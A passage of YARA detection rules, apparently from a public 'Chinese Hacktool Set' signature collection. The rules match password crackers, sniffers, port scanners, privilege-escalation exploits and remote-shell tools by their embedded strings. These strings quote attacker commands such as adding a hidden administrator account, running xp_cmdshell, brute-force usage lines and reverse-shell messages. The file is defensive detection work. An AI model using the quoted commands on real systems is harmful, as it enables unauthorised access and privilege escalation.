xsniff.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "d61d7329ac74f66245a92c4505a327c85875c577" strings: $s0 = "xsiff.exe -pass -hide -log pass.log" fullword ascii $s1 = "HOST: %s USER: %s, PASS: %s" fullword ascii $s2 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii $s10 = "Code by glacier <glacier@xfocus.org>" fullword ascii $s11 = "%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%d" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 220KB and 2 of them } rule MSSqlPass { meta: description = "Chinese Hacktool Set - file MSSqlPass.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "172b4e31ed15d1275ac07f3acbf499daf9a055d7" strings: $s0 = "Reveals the passwords stored in the Registry by Enterprise Manager of SQL Server" wide $s1 = "empv.exe" fullword wide $s2 = "Enterprise Manager PassView" fullword wide condition: uint16(0) == 0x5a4d and filesize < 120KB and all of them } rule WSockExpert { meta: description = "Chinese Hacktool Set - file WSockExpert.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "2962bf7b0883ceda5e14b8dad86742f95b50f7bf" strings: $s1 = "OpenProcessCmdExecute!" fullword ascii $s2 = "http://www.hackp.com" fullword ascii $s3 = "'%s' is not a valid time!'%s' is not a valid date and time" fullword wide $s4 = "SaveSelectedFilterCmdExecute" fullword ascii $s5 = "PasswordChar@" fullword ascii $s6 = "WSockHook.DLL" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2500KB and 4 of them } rule Ms_Viru_racle { meta: description = "Chinese Hacktool Set - file racle.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "13116078fff5c87b56179c5438f008caf6c98ecb" strings: $s0 = "PsInitialSystemProcess @%p" fullword ascii $s1 = "PsLookupProcessByProcessId(%u) Failed" fullword ascii $s2 = "PsLookupProcessByProcessId(%u) => %p" fullword ascii $s3 = "FirstStage() Loaded, CurrentThread @%p Stack %p - %p" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 210KB and all of them } rule lamescan3 { meta: description = "Chinese Hacktool Set - file lamescan3.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "3130eefb79650dab2e323328b905e4d5d3a1d2f0" strings: $s1 = "dic\\loginlist.txt" fullword ascii $s2 = "Radmin.exe" fullword ascii $s3 = "lamescan3.pdf!" fullword ascii $s4 = "dic\\passlist.txt" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 3740KB and all of them } rule CN_Tools_pc { meta: description = "Chinese Hacktool Set - file pc.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "5cf8caba170ec461c44394f4058669d225a94285" strings: $s0 = "\\svchost.exe" fullword ascii $s2 = "%s%08x.001" fullword ascii $s3 = "Qy001Service" fullword ascii $s4 = "/.MIKY" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule Dos_Down64 { meta: description = "Chinese Hacktool Set - file Down64.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "43e455e43b49b953e17a5b885ffdcdf8b6b23226" strings: $s1 = "C:\\Windows\\Temp\\Down.txt" fullword wide $s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide $s3 = "C:\\Windows\\Temp\\" fullword wide $s4 = "ProcessXElement" fullword ascii $s8 = "down.exe" fullword wide $s20 = "set_Timer1" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 150KB and all of them } rule epathobj_exp32 { meta: description = "Chinese Hacktool Set - file epathobj_exp32.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ed86ff44bddcfdd630ade8ced39b4559316195ba" strings: $s0 = "Watchdog thread %d waiting on Mutex" fullword ascii $s1 = "Exploit ok run command" fullword ascii $s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" fullword ascii $s3 = "Alllocated userspace PATHRECORD () %p" fullword ascii $s4 = "Mutex object did not timeout, list not patched" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 270KB and all of them } rule Tools_unknown { meta: description = "Chinese Hacktool Set - file unknown.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "4be8270c4faa1827177e2310a00af2d5bcd2a59f" strings: $s1 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide $s2 = "GET /ok.asp?id=1__sql__ HTTP/1.1" fullword ascii $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */ $s4 = "Failed to clear tab control Failed to delete tab at index %d\"Failed to retrieve" wide $s5 = "Host: 127.0.0.1" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2500KB and 4 of them } rule PLUGIN_AJunk { meta: description = "Chinese Hacktool Set - file AJunk.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "eb430fcfe6d13b14ff6baa4b3f59817c0facec00" strings: $s1 = "AJunk.dll" fullword ascii $s2 = "AJunk.DLL" fullword wide $s3 = "AJunk Dynamic Link Library" fullword wide condition: uint16(0) == 0x5a4d and filesize < 560KB and all of them } rule IISPutScanner { meta: description = "Chinese Hacktool Set - file IISPutScanner.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "9869c70d6a9ec2312c749aa17d4da362fa6e2592" strings: $s2 = "KERNEL32.DLL" fullword ascii $s3 = "ADVAPI32.DLL" fullword ascii $s4 = "VERSION.DLL" fullword ascii $s5 = "WSOCK32.DLL" fullword ascii $s6 = "COMCTL32.DLL" fullword ascii $s7 = "GDI32.DLL" fullword ascii $s8 = "SHELL32.DLL" fullword ascii $s9 = "USER32.DLL" fullword ascii $s10 = "OLEAUT32.DLL" fullword ascii $s11 = "LoadLibraryA" fullword ascii $s12 = "GetProcAddress" fullword ascii $s13 = "VirtualProtect" fullword ascii $s14 = "VirtualAlloc" fullword ascii $s15 = "VirtualFree" fullword ascii $s16 = "ExitProcess" fullword ascii $s17 = "RegCloseKey" fullword ascii $s18 = "GetFileVersionInfoA" fullword ascii $s19 = "ImageList_Add" fullword ascii $s20 = "BitBlt" fullword ascii $s21 = "ShellExecuteA" fullword ascii $s22 = "ActivateKeyboardLayout" fullword ascii $s23 = "BBABORT" fullword wide $s25 = "BBCANCEL" fullword wide $s26 = "BBCLOSE" fullword wide $s27 = "BBHELP" fullword wide $s28 = "BBIGNORE" fullword wide $s29 = "PREVIEWGLYPH" fullword wide $s30 = "DLGTEMPLATE" fullword wide $s31 = "TABOUTBOX" fullword wide $s32 = "TFORM1" fullword wide $s33 = "MAINICON" fullword wide condition: uint16(0) == 0x5a4d and filesize < 500KB and filesize > 350KB and all of them } rule IDTools_For_WinXP_IdtTool_2 { meta: description = "Chinese Hacktool Set - file IdtTool.sys" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "07feb31dd21d6f97614118b8a0adf231f8541a67" strings: $s0 = "\\Device\\devIdtTool" fullword wide $s1 = "IoDeleteSymbolicLink" fullword ascii /* Goodware String - occured 467 times */ $s3 = "IoDeleteDevice" fullword ascii /* Goodware String - occured 993 times */ $s6 = "IoCreateSymbolicLink" fullword ascii /* Goodware String - occured 467 times */ $s7 = "IoCreateDevice" fullword ascii /* Goodware String - occured 988 times */ condition: uint16(0) == 0x5a4d and filesize < 7KB and all of them } rule hkmjjiis6 { meta: description = "Chinese Hacktool Set - file hkmjjiis6.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7" strings: $s1 = "comspec" fullword ascii $s2 = "user32.dlly" ascii $s3 = "runtime error" ascii $s4 = "WinSta0\\Defau" ascii $s5 = "AppIDFlags" fullword ascii $s6 = "GetLag" fullword ascii $s7 = "* FROM IIsWebInfo" ascii $s8 = "wmiprvse.exe" ascii $s9 = "LookupAcc" ascii condition: uint16(0) == 0x5a4d and filesize < 70KB and all of them } rule Dos_lcx { meta: description = "Chinese Hacktool Set - file lcx.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b6ad5dd13592160d9f052bb47b0d6a87b80a406d" strings: $s0 = "c:\\Users\\careful_snow\\" ascii $s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii $s3 = "[SERVER]connection to %s:%d error" fullword ascii $s4 = "-tran <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii $s6 = "=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] " ascii $s7 = "[-] There is a error...Create a new connection." fullword ascii $s8 = "[+] Accept a Client on port %d from %s" fullword ascii $s11 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii $s13 = "[+] Make a Connection to %s:%d...." fullword ascii $s16 = "-listen <ConnectPort> <TransmitPort>" fullword ascii $s17 = "[+] Waiting another Client on port:%d...." fullword ascii $s18 = "[+] Accept a Client on port %d from %s ......" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 2 of them } rule x_way2_5_X_way { meta: description = "Chinese Hacktool Set - file X-way.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "8ba8530fbda3e8342e8d4feabbf98c66a322dac6" strings: $s0 = "TTFTPSERVERFRM" fullword wide $s1 = "TPORTSCANSETFRM" fullword wide $s2 = "TIISSHELLFRM" fullword wide $s3 = "TADVSCANSETFRM" fullword wide $s4 = "ntwdblib.dll" fullword ascii $s5 = "TSNIFFERFRM" fullword wide $s6 = "TCRACKSETFRM" fullword wide $s7 = "TCRACKFRM" fullword wide $s8 = "dbnextrow" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and 5 of them } rule tools_Sqlcmd { meta: description = "Chinese Hacktool Set - file Sqlcmd.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "99d56476e539750c599f76391d717c51c4955a33" strings: $s0 = "[Usage]: %s <HostName|IP> <UserName> <Password>" fullword ascii $s1 = "=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============" fullword ascii /* PEStudio Blacklist: os */ $s4 = "Cool! Connected to SQL server on %s successfully!" fullword ascii $s5 = "EXEC master..xp_cmdshell \"%s\"" fullword ascii $s6 = "=======================Sqlcmd v0.21 For HScan v1.20=======================" fullword ascii $s10 = "Error,exit!" fullword ascii $s11 = "Sqlcmd>" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 40KB and 3 of them } rule Sword1_5 { meta: description = "Chinese Hacktool Set - file Sword1.5.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f" strings: $s3 = "http://www.ip138.com/ip2city.asp" fullword wide $s4 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide $s6 = "ListBox_Command" fullword wide $s13 = "md=7fef6171469e80d32c0559f88b377245&submit=MD5+Crack" fullword wide $s18 = "\\Set.ini" fullword wide $s19 = "OpenFileDialog1" fullword wide $s20 = " (*.txt)|*.txt" fullword wide condition: uint16(0) == 0x5a4d and filesize < 400KB and 4 of them } rule Tools_scan { meta: description = "Chinese Hacktool Set - file scan.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "c580a0cc41997e840d2c0f83962e7f8b636a5a13" strings: $s2 = "Shanlu Studio" fullword wide $s3 = "_AutoAttackMain" fullword ascii $s4 = "_frmIpToAddr" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 3000KB and all of them } rule Dos_c { meta: description = "Chinese Hacktool Set - file c.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "3deb6bd52fdac6d5a3e9a91c585d67820ab4df78" strings: $s0 = "!Win32 .EXE." fullword ascii $s1 = ".MPRESS1" fullword ascii $s2 = ".MPRESS2" fullword ascii $s3 = "XOLEHLP.dll" fullword ascii $s4 = "</body></html>" fullword ascii $s8 = "DtcGetTransactionManagerExA" fullword ascii /* Goodware String - occured 12 times */ $s9 = "GetUserNameA" fullword ascii /* Goodware String - occured 305 times */ condition: uint16(0) == 0x5a4d and filesize < 100KB and all of them } rule arpsniffer { meta: description = "Chinese Hacktool Set - file arpsniffer.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "7d8753f56fc48413fc68102cff34b6583cb0066c" strings: $s1 = "SHELL" ascii $s2 = "PacketSendPacket" fullword ascii $s3 = "ArpSniff" ascii $s4 = "pcap_loop" fullword ascii /* Goodware String - occured 3 times */ $s5 = "packet.dll" fullword ascii /* Goodware String - occured 4 times */ condition: uint16(0) == 0x5a4d and filesize < 120KB and all of them } rule pw_inspector_2 { meta: description = "Chinese Hacktool Set - file pw-inspector.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "e0a1117ee4a29bb4cf43e3a80fb9eaa63bb377bf" strings: $s1 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii $s2 = "Syntax: %s [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p " ascii $s3 = "PW-Inspector" fullword ascii $s4 = "i:o:m:M:c:lunps" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 2 of them } rule datPcShare { meta: description = "Chinese Hacktool Set - file datPcShare.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "87acb649ab0d33c62e27ea83241caa43144fc1c4" strings: $s1 = "PcShare.EXE" fullword wide $s2 = "MZKERNEL32.DLL" fullword ascii $s3 = "PcShare" fullword wide $s4 = "QQ:4564405" fullword wide condition: uint16(0) == 0x5a4d and filesize < 500KB and all of them } rule Tools_xport { meta: description = "Chinese Hacktool Set - file xport.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "9584de562e7f8185f721e94ee3cceac60db26dda" strings: $s1 = "Match operate system failed, 0x%00004X:%u:%d(Window:TTL:DF)" fullword ascii $s2 = "Example: xport www.xxx.com 80 -m syn" fullword ascii $s3 = "%s - command line port scanner" fullword ascii $s4 = "xport 192.168.1.1 1-1024 -t 200 -v" fullword ascii $s5 = "Usage: xport <Host> <Ports Scope> [Options]" fullword ascii $s6 = ".\\port.ini" fullword ascii $s7 = "Port scan complete, total %d port, %d port is opened, use %d ms." fullword ascii $s8 = "Code by glacier <glacier@xfocus.org>" fullword ascii $s9 = "http://www.xfocus.org" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 2 of them } rule Pc_xai { meta: description = "Chinese Hacktool Set - file xai.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "f285a59fd931ce137c08bd1f0dae858cc2486491" strings: $s1 = "Powered by CoolDiyer @ C.Rufus Security Team 05/19/2008 http://www.xcodez.com/" fullword wide $s2 = "%SystemRoot%\\System32\\" fullword ascii $s3 = "%APPDATA%\\" fullword ascii $s4 = "---- C.Rufus Security Team ----" fullword wide $s5 = "www.snzzkz.com" fullword wide $s6 = "%CommonProgramFiles%\\" fullword ascii $s7 = "GetRand.dll" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 3000KB and all of them } rule Radmin_Hash { meta: description = "Chinese Hacktool Set - file Radmin_Hash.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "be407bd5bf5bcd51d38d1308e17a1731cd52f66b" strings: $s1 = "<description>IEBars</description>" fullword ascii $s2 = "PECompact2" fullword ascii $s3 = "Radmin, Remote Administrator" fullword wide $s4 = "Radmin 3.0 Hash " fullword wide $s5 = "HASH1.0" fullword wide condition: uint16(0) == 0x5a4d and filesize < 600KB and all of them } rule OSEditor { meta: description = "Chinese Hacktool Set - file OSEditor.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "6773c3c6575cf9cfedbb772f3476bb999d09403d" strings: $s1 = "OSEditor.exe" fullword wide $s2 = "netsafe" wide $s3 = "OSC Editor" fullword wide $s4 = "GIF89" ascii $s5 = "Unlock" ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and all of them } rule GoodToolset_ms11011 { meta: description = "Chinese Hacktool Set - file ms11011.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386" strings: $s0 = "\\i386\\Hello.pdb" ascii $s1 = "OS not supported." fullword ascii $s3 = "Not supported." fullword wide /* Goodware String - occured 3 times */ $s4 = "SystemDefaultEUDCFont" fullword wide /* Goodware String - occured 18 times */ condition: uint16(0) == 0x5a4d and filesize < 100KB and all of them } rule FreeVersion_release { meta: description = "Chinese Hacktool Set - file release.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "f42e4b5748e92f7a450eb49fc89d6859f4afcebb" strings: $s1 = "-->Got WMI process Pid: %d " ascii $s2 = "This exploit will execute \"net user " ascii $s3 = "net user temp 123456 /add & net localgroup administrators temp /add" fullword ascii $s4 = "Running reverse shell" ascii $s5 = "wmiprvse.exe" fullword ascii $s6 = "SELECT * FROM IIsWebInfo" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 3 of them } rule churrasco { meta: description = "Chinese Hacktool Set - file churrasco.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "a8d4c177948a8e60d63de9d0ed948c50d0151364" strings: $s1 = "Done, command should have ran as SYSTEM!" ascii $s2 = "Running command with SYSTEM Token..." ascii $s3 = "Thread impersonating, got NETWORK SERVICE Token: 0x%x" ascii $s4 = "Found SYSTEM token 0x%x" ascii $s5 = "Thread not impersonating, looking for another thread..." ascii condition: uint16(0) == 0x5a4d and filesize < 150KB and 2 of them } rule x64_KiwiCmd { meta: description = "Chinese Hacktool Set - file KiwiCmd.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86" strings: $s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide $s2 = "Kiwi Cmd no-gpo" fullword wide $s3 = "KiwiAndCMD" fullword wide condition: uint16(0) == 0x5a4d and filesize < 400KB and 2 of them } rule sql1433_SQL { meta: description = "Chinese Hacktool Set - file SQL.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "025e87deadd1c50b1021c26cb67b76b476fafd64" strings: /* WIDE: ProductName 1433 */ $s0 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 31 00 34 00 33 00 33 } /* WIDE: ProductVersion 1,4,3,3 */ $s1 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2C 00 34 00 2C 00 33 00 2C 00 33 } condition: uint16(0) == 0x5a4d and filesize < 90KB and all of them } rule CookieTools2 { meta: description = "Chinese Hacktool Set - file CookieTools2.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "cb67797f229fdb92360319e01277e1345305eb82" strings: $s1 = "www.gxgl.com&www.gxgl.net" fullword wide $s2 = "ip.asp?IP=" fullword ascii $s3 = "MSIE 5.5;" fullword ascii $s4 = "SOFTWARE\\Borland\\" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 700KB and all of them } rule cyclotron { meta: description = "Chinese Hacktool Set - file cyclotron.sys" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "5b63473b6dc1e5942bf07c52c31ba28f2702b246" strings: $s1 = "\\Device\\IDTProt" fullword wide $s2 = "IoDeleteSymbolicLink" fullword ascii /* Goodware String - occured 467 times */ $s3 = "\\??\\slIDTProt" fullword wide $s4 = "IoDeleteDevice" fullword ascii /* Goodware String - occured 993 times */ $s5 = "IoCreateSymbolicLink" fullword ascii /* Goodware String - occured 467 times */ condition: uint16(0) == 0x5a4d and filesize < 3KB and all of them } rule xscan_gui { meta: description = "Chinese Hacktool Set - file xscan_gui.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "a9e900510396192eb2ba4fb7b0ef786513f9b5ab" strings: $s1 = "%s -mutex %s -host %s -index %d -config \"%s\"" fullword ascii $s2 = "www.target.com" fullword ascii $s3 = "%s\\scripts\\desc\\%s.desc" fullword ascii $s4 = "%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l" ascii condition: uint16(0) == 0x5a4d and filesize < 3000KB and all of them } rule CN_Tools_hscan { meta: description = "Chinese Hacktool Set - file hscan.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "17a743e40790985ececf5c66eaad2a1f8c4cffe8" strings: $s1 = "%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000" fullword ascii $s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20" fullword ascii $s3 = "%s -h www.target.com -all" fullword ascii $s4 = ".\\report\\%s-%s.html" fullword ascii $s5 = ".\\log\\Hscan.log" fullword ascii $s6 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii $s7 = "%s@ftpscan#FTP Account: %s/[null]" fullword ascii $s8 = ".\\conf\\mysql_pass.dic" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule GoodToolset_pr { meta: description = "Chinese Hacktool Set - file pr.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "f6676daf3292cff59ef15ed109c2d408369e8ac8" strings: $s1 = "-->Got WMI process Pid: %d " ascii $s2 = "-->This exploit gives you a Local System shell " ascii $s3 = "wmiprvse.exe" fullword ascii $s4 = "Try the first %d time" fullword ascii $s5 = "-->Build&&Change By p " ascii $s6 = "root\\MicrosoftIISv2" fullword wide condition: uint16(0) == 0x5a4d and filesize < 200KB and all of them } rule hydra_7_4_1_hydra { meta: description = "Chinese Hacktool Set - file hydra.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "3411d0380a1c1ebf58a454765f94d4f1dd714b5b" strings: $s1 = "%d of %d target%s%scompleted, %lu valid password%s found" fullword ascii $s2 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii $s3 = "hydra -P pass.txt target cisco-enable (direct console access)" fullword ascii $s4 = "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED" fullword ascii $s5 = "[ERROR] SMTP LOGIN AUTH, either this auth is disabled" fullword ascii $s6 = "\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them } rule CN_Tools_srss_2 { meta: description = "Chinese Hacktool Set - file srss.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "c418b30d004051bbf1b2d3be426936b95b5fea6f" strings: $x1 = "used pepack!" fullword ascii $s1 = "KERNEL32.dll" fullword ascii $s2 = "KERNEL32.DLL" fullword ascii $s3 = "LoadLibraryA" fullword ascii $s4 = "GetProcAddress" fullword ascii $s5 = "VirtualProtect" fullword ascii $s6 = "VirtualAlloc" fullword ascii $s7 = "VirtualFree" fullword ascii $s8 = "ExitProcess" fullword ascii condition: uint16(0) == 0x5a4d and ( $x1 at 0 ) and filesize < 14KB and all of ($s*) } rule Dos_NtGod { meta: description = "Chinese Hacktool Set - file NtGod.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "adefd901d6bbd8437116f0170b9c28a76d4a87bf" strings: $s0 = "\\temp\\NtGodMode.exe" ascii $s4 = "NtGodMode.exe" fullword ascii $s10 = "ntgod.bat" fullword ascii $s19 = "sfxcmd" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 250KB and all of them } rule CN_Tools_VNCLink { meta: description = "Chinese Hacktool Set - file VNCLink.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "cafb531822cbc0cfebbea864489eebba48081aa1" strings: $s1 = "C:\\temp\\vncviewer4.log" fullword ascii $s2 = "[BL4CK] Patched by redsand || http://blacksecurity.org" fullword ascii $s3 = "fake release extendedVkey 0x%x, keysym 0x%x" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 580KB and 2 of them } rule tools_NTCmd { meta: description = "Chinese Hacktool Set - file NTCmd.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "a3ae8659b9a673aa346a60844208b371f7c05e3c" strings: $s1 = "pipecmd \\\\%s -U:%s -P:\"\" %s" fullword ascii $s2 = "[Usage]: %s <HostName|IP> <Username> <Password>" fullword ascii $s3 = "pipecmd \\\\%s -U:%s -P:%s %s" fullword ascii $s4 = "============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net============" fullword ascii /* PEStudio Blacklist: os */ $s5 = "=======================NTcmd v0.11 for HScan v1.20=======================" fullword ascii $s6 = "NTcmd>" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 80KB and 2 of them } rule mysql_pwd_crack { meta: description = "Chinese Hacktool Set - file mysql_pwd_crack.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "57d1cb4d404688804a8c3755b464a6e6248d1c73" strings: $s1 = "mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt" fullword ascii $s2 = "Successfully --> username %s password %s " fullword ascii $s3 = "zhouzhen@gmail.com http://zhouzhen.eviloctal.org" fullword ascii $s4 = "-a automode automatic crack the mysql password " fullword ascii $s5 = "mysql_pwd_crack 127.0.0.1 -x 3306 -a" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 1 of them } rule CmdShell64 { meta: description = "Chinese Hacktool Set - file CmdShell64.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "5b92510475d95ae5e7cd6ec4c89852e8af34acf1" strings: $s1 = "C:\\Windows\\System32\\JAVASYS.EXE" fullword wide $s2 = "ServiceCmdShell" fullword ascii $s3 = "<!-- If your application is designed to work with Windows 8.1, uncomment the fol" ascii $s4 = "ServiceSystemShell" fullword wide $s5 = "[Root@CmdShell ~]#" fullword wide $s6 = "Hello Man 2015 !" fullword wide $s7 = "CmdShell" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 30KB and 4 of them } rule Ms_Viru_v { meta: description = "Chinese Hacktool Set - file v.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ecf4ba6d1344f2f3114d52859addee8b0770ed0d" strings: $s1 = "c:\\windows\\system32\\command.com /c " fullword ascii $s2 = "Easy Usage Version -- Edited By: racle@tian6.com" fullword ascii $s3 = "OH,Sry.Too long command." fullword ascii $s4 = "Success! Commander." fullword ascii $s5 = "Hey,how can racle work without ur command ?" fullword ascii $s6 = "The exploit thread was unable to map the virtual 8086 address space" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 3 of them } rule CN_Tools_Vscan { meta: description = "Chinese Hacktool Set - file Vscan.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "0365fe05e2de0f327dfaa8cd0d988dbb7b379612" strings: $s1 = "[+] Usage: VNC_bypauth <target> <scantype> <option>" fullword ascii $s2 = "========RealVNC <= 4.1.1 Bypass Authentication Scanner=======" fullword ascii $s3 = "[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations" fullword ascii $s4 = "VNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,..." fullword ascii $s5 = "-vn:%-15s:%-7d connection closed" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 60KB and 2 of them } rule Dos_iis { meta: description = "Chinese Hacktool Set - file iis.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "61ffd2cbec5462766c6f1c44bd44eeaed4f3d2c7" strings: $s1 = "comspec" fullword ascii $s2 = "program terming" fullword ascii $s3 = "WinSta0\\Defau" fullword ascii $s4 = "* FROM IIsWebInfo" ascii $s5 = "www.icehack." ascii $s6 = "wmiprvse.exe" fullword ascii $s7 = "Pid: %d" ascii condition: uint16(0) == 0x5a4d and filesize < 70KB and all of them } rule IISPutScannesr { meta: description = "Chinese Hacktool Set - file IISPutScannesr.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "2dd8fee20df47fd4eed5a354817ce837752f6ae9" strings: $s1 = "yoda & M.o.D." ascii $s2 = "-> come.to/f2f **************" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 500KB and all of them } rule Generate { meta: description = "Chinese Hacktool Set - file Generate.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "2cb4c3916271868c30c7b4598da697f59e9c7a12" strings: $s1 = "C:\\TEMP\\" fullword ascii $s2 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide $s3 = "$530 Please login with USER and PASS." fullword ascii $s4 = "_Shell.exe" fullword ascii $s5 = "ftpcWaitingPassword" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and 3 of them } rule Pc_rejoice { meta: description = "Chinese Hacktool Set - file rejoice.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372" strings: $s1 = "@members.3322.net/dyndns/update?system=dyndns&hostname=" fullword ascii $s2 = "http://www.xxx.com/xxx.exe" 